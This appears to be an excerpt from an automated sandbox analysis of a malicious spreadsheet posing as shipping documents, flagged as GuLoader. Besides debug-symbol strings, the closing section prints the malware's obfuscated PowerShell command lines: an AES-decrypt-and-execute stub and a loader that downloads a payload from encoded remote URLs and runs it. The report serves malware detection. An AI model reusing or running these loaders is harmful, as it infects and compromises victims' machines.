Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp

Source: 1E630000.0.dr

Initial sample: OLE indicators vbamacros = False

Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000019.00000002.967882170.0000000007895000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Obfuscated command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance 